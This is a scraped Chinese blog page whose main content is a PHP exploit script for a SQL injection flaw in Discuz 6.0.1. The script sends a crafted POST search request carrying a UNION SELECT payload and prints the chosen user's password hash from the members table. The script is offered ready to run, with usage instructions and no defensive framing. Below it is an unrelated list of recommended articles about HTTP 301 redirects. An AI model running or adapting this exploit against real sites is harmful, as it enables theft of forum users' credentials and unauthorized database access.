301 permanently moved

最新推荐文章于 2025-01-03 10:26:36 发布
最新推荐文章于 2025-01-03 10:26:36 发布
阅读量495 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: php 文章标签: php c/c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteye_12650/article/details/82243096
本文介绍了一种针对 Discuz 6.0.1 版本的 SQL 注入漏洞利用方法,通过构造特定的 HTTP 请求来获取指定用户的密码等敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+——————————————————————+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  冰封浪子&小志
+——————————————————————+
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host:      target server \n";
echo "port:      the web port, usually 80\n";
echo "path:      path to discuz\n";
echo "uid :      user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-length: ".strlen($content)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content."\r\n\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo 'No response from '.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
echo fgets($ock, 1024);
}

Nginx 301跳转踩坑总结
被基金支配的打工人
10-23 4977
有一天,公司的服务切换域名,禁用了http协议,只允许通过https协议访问。这时出现了一个奇奇怪怪的问题,在浏览器地址栏敲入url访问静态资源目录时,发现默认跳转到了http协议的地址。网络拓扑结构如下: 如上图所示,客户端https请求先到达API网关,然后网关将请求通过http协议转发到静态资源服务器。 调出浏览器发现客户端发送的https请求收到了一个301状态码的响应,并且响应头中的Location字段便是跳转到的http协议的地址。 1.原因分析 为啥服务端会返回301呢?首先需要弄
使用RestTemplate报301 Moved Permanently解决
felix
04-22 1425
使用restTemplate时报下面的错误 <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>openresty</center> </body&
301 Moved Permanently:了解HTTP永久重定向错误码
博客
08-14 3万+
301 Moved Permanently是HTTP状态码中表示永久重定向的一种。当服务器返回这个状态码时,它告诉客户端请求的资源已经被永久移动到了一个新的URL上,并且以后的请求应该使用新的URL。这个状态码主要用于网站重构、更换域名或者更改URL结构等情况下,确保旧的URL能够正确地指向新的位置。永久重定向是一种HTTP重定向技术,用于将一个URL永久地指向到另一个URL。当服务器返回301 Moved Permanently状态码时,客户端会自动将请求的URL替换为新的URL,并发送新的请求。
301 MovedPermanently 重定向
weixin_30793643的博客
07-07 1468
页面永久性移走(301重定向)是一种非常重要的“自动转向”技术。   301重定向可促进搜索引擎优化效果   从搜索引擎优化角度出发,301重定向是网址重定向最为可行的一种办法。当网站的域名发生变更后,搜索引擎只对新网址进行索引,同时又会把旧地址下原有的外部链接如数转移到新地址下,从而不会让网站的排名因为网址变更而收到丝毫影响。同样,在使用301永久性重定向命令让多个域名指向网站主域时,亦不会...
接口访问报错:301 Moved Permanently
一点光辉的博客
02-07 3万+
场景 今天接口访问报错:301 Moved Permanently。我傻傻的检查了好半天后台日志,发现怎么都找不到。后来问了大神,才晓得301请求压根就没有到后台,当然没有日志了。 报错如下: 解释: 「301 Moved Permanently」表示永久重定向,说明请求的资源已经不存在了,需改⽤新的 URL 再次访问。 301 和 302 都会在响应头里使用字段 Location ,指明后续要跳转的 URL,浏览器、postman等会自动定向新的 URL。 解决: 检查接口请求地址。
调试程序时出现 301 Moved Permanently,问题是运行程序的服务器没有配置localhost中的域名
seared2008的专栏
09-25 3568
调试程序时出现 【301 Moved Permanently nginx/0.5.23】, 问题是运行程序的服务器没有配置localhost中的域名,程序中跳转到一个没有配置的域名中,出现如上提示
POST请求慎用301 Moved Permanently
皖南笑笑生的博客
12-04 9万+
在全站启用HTTPS的过程中,遇到一个坑,在此做下记录。在全站支持HTTPS以后,用户可能还会使用http访问,所以很多建议使用301 Moved Permanently+HSTS( Strict Transport Security Policy)的方式要求用户跳转到HTTPS后再访问。然而,对于有POST请求的域名是不适合用301 Moved Permanently
node爬虫遇上301重定向Moved Permanently
CasperNan的博客
12-12 6298
遇到场景:在爬取相关网站时,刚开始一段时间可以爬,过了一段时间后则爬取报错 301 Moved Permanently,浏览器打开网站是正常打开。 以下是遇到该报错时的代码: const charset = require('superagent-charset') const request = require('superagent') // 通过该网址和指定字符编码来爬取文章 request...
JAVA实现301永久重定向方法
08-27
301重定向就是在响应中设置状态码为301(`SC_MOVED_PERMANENTLY`)和`Location`头信息。 以下是一个简单的Java JSP页面实现301重定向的例子: ```jsp ; charset=UTF-8" pageEncoding="UTF-8"%> // 清除缓冲,...
301 Moved Permanently问题排查与解决
热门推荐
taipoucha5799的博客
11-04 11万+
1、问题描述 技术支持反馈通知商户通知不到。即根据商户传过来的地址(举例:http://www.A.com)进行封装(封装后:http://www.A.com?trxNo=123)并请求商户,结果是失败。 2、问题排查 遇到问题,首先是在机器curl下,发现出现了301 Moved Permanently。简单解释下这个错误码 3xx 类状态码表示客户端请求的资源发送了变动,需要客户端⽤新的 URL ᯿新发送请求获取资源,也就是重定向。 「301 Moved Permanently」表示..
nginx 301 Moved Permanently 重定向问题
justdoit
07-22 2930
nginx 301 Moved Permanently 重定向问题
Subversion 出现 301 Moved Permanently 的解决方法
08-15 4401
会出现这个讯息的原因,通常就是 Subversion 的 Repository 目录放在 apache 设定的文件根目录里面。 先打开 apache 的 httpd.conf 看看 DocumentRoot 设在哪里:DocumentRoot "/var/www/html"再看看 SVNPath 或 SVNParentPath 设的目录是不是一样? DAV svnSVNParentPath /
301重定向
最新发布
wangqiaowq的博客
01-03 767
**更新内部链接**:除了设置301重定向外,还应该更新网站内部的链接,以直接指向新的URL,这样可以减少对服务器的额外负担并提高用户体验。- **缓存机制**:一旦客户端收到301响应,通常会缓存这个信息,以后再访问相同的URL时会直接跳转到新的URL,而不会再次查询服务器。- **合并内容**:当多个页面的内容被合并为一个页面时,可以使用301重定向将这些页面的流量引导至合并后的新页面。- **域名变更**:如果你需要更换域名,可以设置301重定向,将旧域名的所有页面重定向到新域名对应页面。
301 Moved Permanently错误
weixin_38710804的博客
01-20 2818
301 Moved Permanently错误
记录Http访问服务接口出现 301 Moved Permanently
LiuCJ_20000的博客
04-04 1531
​ 在A服务中 需要通过远程调用 B服务接口 获取数据。A项目与B项目部署在不同的服务接口中。​ 在调用B项目的接口时,响应的数据一直为Html代码,通过 response.getWriter().write(result);将响应界面展示如下:​​ 但是直径通过浏览器界面访问该接口时,是能成功的远程调用并且返回正确的数据。排查调用远程接口的代码也没问题。前期一直找不到原因所在!
301 moved permanently 报错
weixin_43835858的博客
11-20 1322
或者接口调用其他服务时,使用域名地址,但是地址用的http协议,会有报错。只需将调用接口的http协议改为https协议即可。服务启动时调用其他的微服务。
Nginx 301重定向分析
CherishL_的专栏
07-23 3083
absolute_redirect ,server_name_in_redirect和port_in_redirect三个设置项中,根据Nginx的源代码中Response Header处理算法逻辑,Nginx能够控制重定向的关键配置项是:absolute_redirect,在整个Nginx代码中,absolute_redirect在控制在Response Header如何增加Location url。备注:header_in.server是nginx源代码中的变量,指向用户输入的url的服务器名字部分。
详解重定向(HTTP状态码301/302/303/307/408)(转载)
m0_46225088的博客
06-26 2840
今天打算好好把状态码301、302、303、307、308好好撸一遍,并会测试下一些例子。
PHP利用fsockopen POST HTTP请求(URL)并获取返回值
u011553255的专栏
08-01 5886
$srv_ip = '192.168.1.5';//你的目标服务地址.   $srv_port = 80;//端口   $url = 'http://localhost/fsock.php'; //接收你post的URL具体地址    $fp = '';   $errno = 0;//错误处理   $errstr = '';//错误处理   $timeout = 10;//多久没有连上就中断   
301 Moved Permanently
07-27
回答: "301 Moved Permanently"是一个HTTP状态码,表示永久重定向。它意味着请求的资源已经不存在了,需要使用新的URL再次访问。\[1\]这个状态码会在响应头中使用字段Location,指明后续要跳转的URL。浏览器和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值